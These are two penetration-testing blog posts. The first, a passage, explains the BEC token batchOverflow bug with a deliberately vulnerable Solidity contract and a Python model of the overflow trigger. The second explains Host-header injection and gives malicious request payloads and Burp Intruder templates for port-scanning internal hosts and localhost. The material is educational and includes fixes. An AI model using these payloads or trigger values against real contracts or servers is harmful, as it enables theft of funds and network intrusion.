src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgyj_B0QDr7dPCmWBaIlx9UWyAltPUvKYCtIIiBYudJth-Ny78mkDIlMso2LReBx615J26uQBlqD0dDDdpzfhYov9itAJSADF45481jJ3DpGG7biO-bMDs2sDAt5kYyg_d8rGDEt2PaQ/s0/download.jpeg" /></a></div><br /><div>Well, that is not exactly true: a contract can be a) destroyed or b) upgraded. 
Which essentially means that the code:</div><div><ul style="text-align: left;"><li>In the first scenario will stop functioning, but won't get deleted (because a blockchain is immutable)</li><li>In the second scenario the smart contract will get:<ul><li>Upgraded with modified code, while not preserving its address, state, and balance.</li><li>Upgraded with modified code, while preserving its address, state, and balance, by using special tools (e.g. the OpenZeppelin Upgrades Plugins, or proxy smart contracts) [7].</li></ul></li></ul></div><div>Below we can see an Ethereum blockchain [6]:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLFl9f3m_vSTzrY3UFS6arMAO6xBvT3TN5MY54zOO9Bqq8pzmv9XX3oq7q90CW_R6HiXwdEC6I66i_sLR5bk4lIYhm7IGYRBbuB0OakfqUQxXfqB756Np2xuecw57-ulHqQi6JzJsCSfU/s1048/eOwjD.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="728" data-original-width="1048" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLFl9f3m_vSTzrY3UFS6arMAO6xBvT3TN5MY54zOO9Bqq8pzmv9XX3oq7q90CW_R6HiXwdEC6I66i_sLR5bk4lIYhm7IGYRBbuB0OakfqUQxXfqB756Np2xuecw57-ulHqQi6JzJsCSfU/w640-h444/eOwjD.png" width="640" /></a></div><br /><div><span style="text-align: justify;">When the contract is destroyed, its account in the state is zeroed. Each block has a <i>"state root"</i> which commits to all accounts. The opcode triggered by a self-destruct zeroes out the smart contract's account. </span><span style="text-align: justify;">The Bitcoin ledger is based on recording transactions, whereas the Ethereum blockchain is based on managing account balances. Why am I giving you all this information? Well, to put it simply, to explain that deleting or upgrading a Smart Contract is not an easy job. 
And guess what, in order to install a security patch to a smart contract we need either to destroy the old smart contract and create a new one, or to upgrade the current smart contract. This essentially means that <b>Smart Contract governance is important</b>. In the early stages of the cryptocurrency space, such governance was not something that was carefully designed.</span></div><div><br /></div><div style="text-align: justify;"><h2>The Money Overflow</h2></div><div style="text-align: justify;"><div>Below we can see some vulnerable code that explains the actual vulnerability. In the following code we replicate the behavior and the insufficient user input validation of the original contract (Solidity 0.4 syntax: functions are public by default and <i>constant</i> is the old spelling of <i>view</i>). </div><div><br /></div><div><span style="color: red;">pragma solidity ^0.4.10;</span></div><div><br /></div><div>contract TheOverflow {</div><div> </div><div><span> </span>mapping (address => uint) contractBalances;</div><div> </div><div><span> </span>// Deposit ether; the deposit is added to the caller's balance</div><div><span> </span>function contribute() payable { </div><div><span> </span><span> </span>contractBalances[msg.sender] += msg.value;</div><div><span> </span>}</div><div> </div><div><span> </span>function getBalance() constant returns (uint) {</div><div> <span> </span>return contractBalances[msg.sender]; </div><div> }</div><div> </div><div><span> </span>// This is the infamous vulnerable batchTransfer function</div><div><span> </span><span style="color: red;">function batchTransfer(address[] _receivers, uint _value) { </span></div><div> // Overflow line that caused the hack: the product wraps around modulo 2^256</div><div> <span> </span><span style="color: red;">uint totalReceivers = _receivers.length * _value;</span></div><div> </div><div> require(contractBalances[msg.sender] >= totalReceivers); // Here is the user input validation</div><div> contractBalances[msg.sender] = contractBalances[msg.sender] - totalReceivers;</div><div> </div><div> for(uint counter=0; counter< _receivers.length; counter++) { // Here is the function loop</div><div> contractBalances[_receivers[counter]] = 
contractBalances[_receivers[counter]] + _value;</div><div> } </div><div> }</div><div>}</div><div><br /></div><div>The way the batchTransfer function works is that it accepts as input the receivers' addresses and the value to transfer, e.g. it will get as input a list with three or more addresses, along with the value of the ETH to transfer. Then it multiplies the number of receivers by the value and checks that total against the sender's balance, i.e. it verifies that the address paying out the ETH has enough.</div><div><br /></div><div><div>How the vulnerable batchTransfer function shown in the code above was abused: </div><div><ol><li>The variable _value accepts the amount to be transferred as user input (declared as a 256-bit unsigned integer).</li><li>The multiplication _receivers.length * _value overflowed: the product wrapped around modulo 2^256 and totalReceivers got zeroed out.</li><li>With totalReceivers zeroed out, the require check got bypassed.</li><li>The require check then became contractBalances[msg.sender] >= 0 (e.g. 0 >= 0), which is always true.</li></ol></div></div><div><h2>What Is An ERC20 Token And Why It Is Relevant</h2><div>ERC-20 has emerged as the <i>de facto</i> technical standard for Smart Contract tokens; it is used for all token implementations on the Ethereum blockchain and provides a list of rules that all Ethereum-based tokens must follow [9]. This means that in order for a token to run on Ethereum, it has to implement certain functionality, or more specifically an interface. </div><div><br /></div><div>As of<u> October 2019, more than 200,000 ERC-20-compatible tokens exist on Ethereum's main network.</u> ERC-20 defines a common list of rules that all Ethereum tokens must adhere to. Some of these rules cover how the tokens can be transferred, how transactions are approved, how users can access data about a token, and the total supply of tokens [9]. Consequently, this standard empowers developers of all types to accurately predict how new tokens will function within the larger Ethereum system. 
The same applies to attackers: a hacker understands that all ERC20 tokens must implement certain functionality in order to interface with the Ethereum blockchain. But the implementation details of these functions are handled by the developer, not by the standard. </div><div><br /></div><h2> How Did Exchanges React To The Hack?</h2><div>Due to a lack of coordination between Centralized Exchanges (CEX) and Decentralized Exchanges (DEX), no immediate response took place. This resulted in the attacks continuing for a long period of time, even after the hack had been noticed. An extra layer of security must be added that monitors Smart Contract behavior and takes action accordingly. For example, in our attack scenario the suspicious transaction should have been blocked due to the excessive withdrawal of funds. </div><h2>The Impact</h2>The bug was discovered 04/22/2018. The weakness was released 04/23/2018 (Website). The advisory is shared at dasp.co. This vulnerability is uniquely identified as CVE-2018-10299 since 04/22/2018. It is possible to initiate the attack remotely. No form of authentication is needed for exploitation. It demands that the victim performs some kind of user interaction. Technical details are known, but no exploit is available. The price for an exploit might be around USD $5k-$25k at the moment (estimation calculated on 01/30/2020) [8]. 
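As an added example (not code from the original post or from the BEC contract), the arithmetic of The Money Overflow section modelled in Python: evm_mul reproduces the EVM's wrapping uint256 multiplication so the bypassed require can be reproduced offline, and checked_mul/checked_add are the SafeMath-style guards that make the same call revert. Sender and receiver addresses are constructed placeholder strings.

```python
"""Model of the batchOverflow arithmetic (CVE-2018-10299) in plain Python.

Added example, not code from the original post or from the BEC contract:
it reproduces the EVM's wrapping uint256 multiplication so the bypassed
`require` can be studied offline, next to the checked (SafeMath-style)
arithmetic that rejects the same input. Addresses are constructed strings.
"""

UINT256_MAX = 2**256 - 1


def evm_mul(a, b):
    """Unchecked uint256 multiplication: the EVM wraps modulo 2**256."""
    return (a * b) & UINT256_MAX


def checked_mul(a, b):
    """SafeMath-style multiply: raises (reverts) instead of wrapping."""
    if a == 0:
        return 0
    c = evm_mul(a, b)
    if c // a != b:
        raise ValueError("SafeMath: multiplication overflow")
    return c


def checked_add(a, b):
    """SafeMath-style add: raises if the sum does not fit in uint256."""
    c = a + b
    if c > UINT256_MAX:
        raise ValueError("SafeMath: addition overflow")
    return c


def vulnerable_batch_transfer(balances, sender, receivers, value):
    """Mirrors the post's batchTransfer: unchecked total, then the require."""
    total = evm_mul(len(receivers), value)
    if not balances.get(sender, 0) >= total:  # the require that gets bypassed
        raise ValueError("require failed")
    balances[sender] = (balances.get(sender, 0) - total) & UINT256_MAX
    for r in receivers:
        balances[r] = (balances.get(r, 0) + value) & UINT256_MAX
    return balances


def hardened_batch_transfer(balances, sender, receivers, value):
    """Same flow with checked arithmetic and rejection of degenerate batches."""
    if not receivers or value == 0:
        raise ValueError("require failed: empty batch")
    total = checked_mul(len(receivers), value)
    if balances.get(sender, 0) < total:
        raise ValueError("require failed: insufficient balance")
    balances[sender] -= total
    for r in receivers:
        balances[r] = checked_add(balances.get(r, 0), value)
    return balances


def demo():
    """Two receivers and value 2**255: 2 * 2**255 == 2**256 wraps to 0.

    Returns (vulnerable_result, hardened_rejected) for a sender whose
    balance is zero; the checked version must refuse the same call.
    """
    value = 2**255
    receivers = ["0xRECEIVER_A", "0xRECEIVER_B"]  # constructed placeholders
    vulnerable = vulnerable_batch_transfer({"0xSENDER": 0}, "0xSENDER",
                                           list(receivers), value)
    try:
        hardened_batch_transfer({"0xSENDER": 0}, "0xSENDER",
                                list(receivers), value)
        rejected = False
    except ValueError:
        rejected = True
    return vulnerable, rejected


if __name__ == "__main__":
    result, rejected = demo()
    print("vulnerable balances after the call:", result)
    print("hardened version rejected the call:", rejected)
```

The same wrap-around happens for any receiver count n and value 2**256 / n whenever n is a power of two, which is why the guard has to be the checked multiply and not a bound on the batch size alone.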
</div></div><div><i><br /></i></div><div><b>References:</b></div><div><ul style="text-align: left;"><li><a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a> [1]</li><li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10299" target="_blank">cve.mitre.org</a> [2]</li><li><a href="https://www.investopedia.com/news/what-erc20-and-what-does-it-mean-ethereum/">investopedia</a> [3]</li><li><a href="https://espeoblockchain.com/blog/ethereum-smart-contract">espeoblockchain</a> [4]</li><li><a href="https://ethereum-classic-guide.readthedocs.io/en/latest/docs/appendices/code_is_law_principle.html">ethereum-classic-guide.readthedocs.io</a> [5]</li><li><a href="https://ethereum.stackexchange.com/questions/1294/what-is-actually-removed-during-a-contract-suicide-and-why-doesnt-this-cause-t?rq=1">ethereum.stackexchange.com</a> [6]</li><li><a href="https://docs.openzeppelin.com/learn/upgrading-smart-contracts">openzeppelin.com</a> [7]</li><li><a href="https://vuldb.com/?id.116961" target="_blank">vuldb.com</a> [8]</li><li><a href="https://www.investopedia.com/news/what-erc20-and-what-does-it-mean-ethereum/" target="_blank">investopedia.com</a> [9]</li></ul><div><br /></div></div><div><br /></div><div class="blogger-post-footer">Penetest Horror 
Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-3427414405397177412020-02-22T09:05:00.003-08:002020-02-29T11:41:17.969-08:00SSRFing External Service Interaction and Out of Band Resource Load (Hacker's Edition)<h2 style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7F4K0eVOTka-oGekk23-G_e7VuO2Tyx-OJeWSNYojFzgJ4YUGq4C05mcVYPcCYlWJ3B9I9Wp15HCsv7HwmZaPafYq1CgKp25rlBVYoF0JbHEPTlaLavAYpr8vCl2DTn49jvcDDakunw0/s1600/linux_cloud_native_environment_1.jpg"><img border="0" height="427" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7F4K0eVOTka-oGekk23-G_e7VuO2Tyx-OJeWSNYojFzgJ4YUGq4C05mcVYPcCYlWJ3B9I9Wp15HCsv7HwmZaPafYq1CgKp25rlBVYoF0JbHEPTlaLavAYpr8vCl2DTn49jvcDDakunw0/s640/linux_cloud_native_environment_1.jpg" width="640" /></a></h2>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In the recent past we encountered two relatively new types of attacks: External Service Interaction (ESI) and Out-of-band Resource Load (OfBRL).</div>
<div style="text-align: justify;">
<ol>
<li>An ESI [1] occurs only when a Web Application allows interaction with an arbitrary external service. </li>
<li>OfBRL [6] arises when it is possible to induce an application to fetch content from an arbitrary external location, and incorporate that content into the application's own response(s). </li>
</ol>
</div>
<h3 style="text-align: justify;">
The Problem with OfBRL</h3>
<div style="text-align: justify;">
The ability to request and retrieve web content from other systems can allow the application server to be used as a two-way attack proxy (when OfBRL is applicable) or a one-way proxy (when ESI is applicable). By submitting suitable payloads, an attacker can cause the application server to attack, or retrieve content from, other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The Problem with ESI</h3>
<div style="text-align: justify;">
External service interaction arises when it is possible to induce an application to interact with an arbitrary external service, such as a web or mail server. The ability to trigger arbitrary external service interactions does not constitute a vulnerability in its own right, and in some cases might even be the intended behavior of the application. However, in many cases, it can indicate a vulnerability with serious consequences.</div>
<div style="text-align: justify;">
<br />
<h3>
The Verification</h3>
<div>
We do not have ESI or OfBRL when:</div>
<div>
<ol>
<li>In Collaborator the source IP is our own browser's IP. </li>
<li>There is a 302 redirect from the host to Collaborator (i.e. our own source IP appears in Collaborator).</li>
</ol>
</div>
</div>
<div style="text-align: justify;">
Below we can see the original configuration in Repeater:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNx_ODVqZjRV4MH6137gE-DBEqvACl1vfgEbMZ3KhUYq6sqzMgbmjF2aTjNFwkV3tfdMNoqnyvMPzUTAerHi5XY7TCPDh610_geEVGXGPnkya-yJ_n8_kQql9dV-l_HGFUL7OlhuUczvc/s1600/screenshot1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="703" data-original-width="697" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNx_ODVqZjRV4MH6137gE-DBEqvACl1vfgEbMZ3KhUYq6sqzMgbmjF2aTjNFwkV3tfdMNoqnyvMPzUTAerHi5XY7TCPDh610_geEVGXGPnkya-yJ_n8_kQql9dV-l_HGFUL7OlhuUczvc/s640/screenshot1.png" width="633" /></a></div>
<div style="text-align: justify;">
<br />
Below we can see the modified configuration in Repeater for the test:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYCB-w_dgKfQIr4JZ7cTCuRwOHOX5udsI7r9I475bgz9IFN6IW-EZfAro4SdkbWhDtEv4crYXihiljFqK-JsVm0r7SujuNl_BtSVCKH6stLNsKsBjTvMOs8B5SZZ3Le4_nzJwy9K629E/s1600/screenshot2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="693" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitYCB-w_dgKfQIr4JZ7cTCuRwOHOX5udsI7r9I475bgz9IFN6IW-EZfAro4SdkbWhDtEv4crYXihiljFqK-JsVm0r7SujuNl_BtSVCKH6stLNsKsBjTvMOs8B5SZZ3Le4_nzJwy9K629E/s640/screenshot2.png" width="630" /></a></div>
<br /></div>
<h3 style="text-align: justify;">
The RFC(s)</h3>
<div style="text-align: justify;">
It is usually a platform issue and not an application one. In some scenarios, for example with a CGI application, the HTTP headers are handled by the application (aka. the app dynamically manipulates the HTTP headers to run properly). This means that HTTP headers such as Location and Host are handled by the app, and therefore a vulnerability might exist. It is recommended to run HTTP header integrity checks when you own a critical application that is running on your behalf.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For more information on the subject read RFC 2616 [2], where the use of the headers is explained in detail. The Host request-header field specifies the Internet host and port number of the resource being requested, as obtained from the original URI given by the user or referring resource (generally an HTTP URL). The Host field value MUST represent the naming authority of the origin server or gateway given by the original URL. This allows the origin server or gateway to differentiate between internally-ambiguous URLs, such as the root "/" URL of a server for multiple host names on a single IP address.<br />
<br />
When TLS is enforced throughout the whole application (even the root path /) an ESI or OfBRL is not possible, because both protocols perform source origin authentication: as soon as a connection is established between an IP and the vulnerable server, the protocol guarantees that the connection is going to serve traffic only for the original IP. More specifically, we are going to get an SNI error.<br />
<br />
SNI prevents what's known as a "common name mismatch error": when a client (user) device reaches the IP address for a vulnerable app, but the name on the SSL/TLS certificate doesn't match the name of the website. SNI was added to the IETF's Internet RFCs in June 2003 through RFC 3546, Transport Layer Security (TLS) Extensions. The latest version of the standard is RFC 6066.<br />
<br /></div>
<div style="text-align: justify;">
The option to trigger an arbitrary external service interaction does not constitute a vulnerability in its own right, and in some cases it might be the intended behavior of the application. But we as hackers want to exploit it, correct? So what can we do with an ESI or an Out-of-band Resource Load?<br />
<br /></div>
<h3 style="text-align: justify;">
The Infrastructure </h3>
<div style="text-align: justify;">
Well, it depends on the overall setup! The juiciest scenarios are the following:</div>
<div style="text-align: justify;">
<ol>
<li>The application is behind a WAF (with restrictive ACLs) </li>
<li>The application is behind a UTM (with restrictive ACLs) </li>
<li>The server is running multiple applications in a virtual environment </li>
<li>The application is running behind a NAT. </li>
</ol>
</div>
<div style="text-align: justify;">
In order to perform the hack we simply have to inject our host value in the HTTP Host header (hostname including port). Below is a simple diagram explaining the vulnerability.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNPshL8ZSk1Hg__uBUm3uZ8j94QxBy2Z-l3l8_9tVg-JCLiwhR1nlwlXe1BQuX6SmfzPIUEAWSEnEdlgYJPmwSa8ZFHqyAGmydUzXp1FgMPrx1-FXoUYbVkpYQvXsuWIGdLmzcH5HZrzg/s1600/blog.png"><img border="0" height="484" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNPshL8ZSk1Hg__uBUm3uZ8j94QxBy2Z-l3l8_9tVg-JCLiwhR1nlwlXe1BQuX6SmfzPIUEAWSEnEdlgYJPmwSa8ZFHqyAGmydUzXp1FgMPrx1-FXoUYbVkpYQvXsuWIGdLmzcH5HZrzg/s640/blog.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below we can see the HTTP requests with the injected Host header:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Original request:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: our_vulnerableapp.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Malicious requests:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: malicious.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
or</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: 127.0.0.1:8080
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
</div>
<br /></div>
<div style="text-align: justify;">
If the application is vulnerable to OfBRL, it means that the reply is going to be processed by the vulnerable application, bounce back to the sender (aka. the hacker) and potentially load in the context of the application. If the reply does not come back to the sender (aka. the hacker) then we might only have an ESI (a one-way interaction), and further investigation is required.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Out-of-band resource load:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzmncCH3MZT5JS7149oKgcGKiCBa8aXCgMSflOtEJ-hwQtsAuO7-w1hhHPUqUSnbkiGdkyBMKP8AY4WSEICsHZnuCZAYyLMOfn6bXORqolLlcLcUbToj5e-LIuompELD7dLq2bziKtnE/s1600/blog1.png"><img border="0" height="473" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMzmncCH3MZT5JS7149oKgcGKiCBa8aXCgMSflOtEJ-hwQtsAuO7-w1hhHPUqUSnbkiGdkyBMKP8AY4WSEICsHZnuCZAYyLMOfn6bXORqolLlcLcUbToj5e-LIuompELD7dLq2bziKtnE/s640/blog1.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
ESI:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN4kuD_IpCS6eWK2Ebzx9dDlxhGn9FGCfK223JoeIuwEPSgqvKGyTO_v1AeqszY7V7RWsLntZXW2FGSRhpMQ3_IEQXOU4rcqzqPlDyTDiD5MfVQuOJXgzpiTtZFzLF5dlPTS2hhX29FdI/s1600/blog2.png"><img border="0" height="476" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN4kuD_IpCS6eWK2Ebzx9dDlxhGn9FGCfK223JoeIuwEPSgqvKGyTO_v1AeqszY7V7RWsLntZXW2FGSRhpMQ3_IEQXOU4rcqzqPlDyTDiD5MfVQuOJXgzpiTtZFzLF5dlPTS2hhX29FdI/s640/blog2.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below we can see the configuration in Intruder:</div>
<div>
<span style="font-size: small; font-weight: 400;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2iubvp_KPKiMRYlxSXS5ajT9A5UeNq9rZUwOafJ0IEcY6gWltJYS8gJcrsJnMD48w4vVPXwE1QIZmjfRt10YjbnfyWZDqBujrG-_oUhVerKIsbAdzvOwDTp-CqwKT-9Sqgs72nKLISg/s1600/screenshot3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="708" data-original-width="695" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiN2iubvp_KPKiMRYlxSXS5ajT9A5UeNq9rZUwOafJ0IEcY6gWltJYS8gJcrsJnMD48w4vVPXwE1QIZmjfRt10YjbnfyWZDqBujrG-_oUhVerKIsbAdzvOwDTp-CqwKT-9Sqgs72nKLISg/s640/screenshot3.png" width="628" /></a></div>
<div>
<span style="font-size: small; font-weight: 400;"><br /></span></div>
<div>
<span style="font-size: small; font-weight: 400;">We are simply using Intruder's Sniper mode, with which we can do the following:</span></div>
<div>
<ol>
<li><span style="font-size: small; font-weight: 400;">Rotate through different ports, using the vulnapp.com domain name.</span></li>
<li>Rotate through different ports, using the vulnapp.com external IP.</li>
<li>Rotate through different ports, using the vulnapp.com internal IP, if applicable.</li>
<li>Rotate through different internal IP(s) in the same domain, if applicable.</li>
<li>Rotate through different protocols (that might not work, BTW).</li>
<li>Brute force directories on identified DMZ hosts.</li>
</ol>
</div>
<h3 style="text-align: justify;">
The Test</h3>
<div style="text-align: justify;">
Burp Professional edition has a feature named Collaborator. Burp Collaborator is a network service that Burp Suite uses to help discover vulnerabilities such as ESI and OfBRL [3]. A typical example would be to use Burp Collaborator to test whether ESI exists. Below we describe such an interaction.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Original request:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: our_vulnerableapp.com
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Collaborator request:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: edgfsdg2zjqjx5dwcbnngxm62pwykabg24r.burpcollaborator.net
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: keep-alive</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Collaborator response:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 53

&lt;html&gt;&lt;body&gt;drjsze8jr734dsxgsdfl2y18bm1g4zjjgz&lt;/body&gt;&lt;/html&gt;</pre>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The Post Exploitation </h3>
<div style="text-align: justify;">
OK, now as hacker artists we are going to think about how to exploit this. The scenarios are [7][8]:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<ol>
<li>Attempt to load the local admin panels. </li>
<li>Attempt to load the admin panels of surrounding applications. </li>
<li>Attempt to interact with other services in the DMZ. </li>
<li>Attempt to port scan the localhost. </li>
<li>Attempt to port scan the DMZ hosts. </li>
<li>Use it to exploit the IP trust and run a DoS attack against other systems. </li>
</ol>
</div>
<div style="text-align: justify;">
A good option for that would be Burp Intruder. Burp Intruder is a tool for automating customized attacks against web applications. It is extremely powerful and configurable, and can be used to perform a huge range of tasks, from simple brute-force guessing of web directories through to active exploitation of complex blind SQL injection vulnerabilities.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for scanning surrounding hosts:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: 192.168.1.§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for port scanning surrounding hosts:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: 192.168.1.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Burp Intruder configuration for port scanning localhost:</div>
<div style="text-align: justify;">
<br /></div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); padding: 1em;">GET / HTTP/1.1
Host: 127.0.0.1:§§
Pragma: no-cache
Cache-Control: no-cache, no-transform
Connection: close</pre>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>What Can You Do</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The big hack analysis; this vulnerability can be used in the following ways:</div>
<div style="text-align: justify;">
<ol>
<li>Bypass restrictive UTM ACL(s) </li>
<li>Bypass restrictive WAF Rule(s) </li>
<li>Bypass restrictive FW ACL(s) </li>
<li>Perform cache poisoning</li>
<li>Fingerprint internal infrastructure</li>
<li>Perform DoS exploiting the IP trust</li>
<li>Exploit applications hosted on the same machine (aka. multiple app loads)</li>
</ol>
</div>
<div style="text-align: justify;">
Below we can see a schematic analysis on bypassing ACL(s):</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvlbvi_nY8Ac9xxiyl3hWFn12B6BelUKUGWnr1fXt3_DO0t4Mhfpjjiwl5PUYtHV9Qb7Eu9fpSSZXSMn5sHiaq3WxofVJc4LlUunCB8C1LdrRGw6F4b9vh7JzlQ-qeQl0KtSvDH6Fgr8I/s1600/blog3.png"><img border="0" height="316" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvlbvi_nY8Ac9xxiyl3hWFn12B6BelUKUGWnr1fXt3_DO0t4Mhfpjjiwl5PUYtHV9Qb7Eu9fpSSZXSMn5sHiaq3WxofVJc4LlUunCB8C1LdrRGw6F4b9vh7JzlQ-qeQl0KtSvDH6Fgr8I/s640/blog3.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected. [5]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Below follows the schematic analysis:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCpNQED6OR4S_MEbw0LHg281amMSLDM7D6tUgg1OpItOSoQWlO694CfMaxcqHAEaA7wG-_FWwgU_UOP8iyIU5Lw42-5HGJUP28tM_joBXGrFwXreZP94cWT4VdwgzWm4tLCxFLA82zps/s1600/screenshot.png"><img border="0" height="351" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtCpNQED6OR4S_MEbw0LHg281amMSLDM7D6tUgg1OpItOSoQWlO694CfMaxcqHAEaA7wG-_FWwgU_UOP8iyIU5Lw42-5HGJUP28tM_joBXGrFwXreZP94cWT4VdwgzWm4tLCxFLA82zps/s640/screenshot.png" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<br />
<b>What Can't You Do</b><br />
You cannot perform XSS or CSRF exploiting this vulnerability, unless certain conditions apply.<br />
<br /></div>
<div style="text-align: justify;">
<b>The fix</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
If the ability to trigger arbitrary ESI or OfBRL is not intended behavior, then you should implement a whitelist of permitted URLs, and block requests to URLs that do not appear on this whitelist [6]. Running host integrity checks is also recommended [6].<br />
<br />
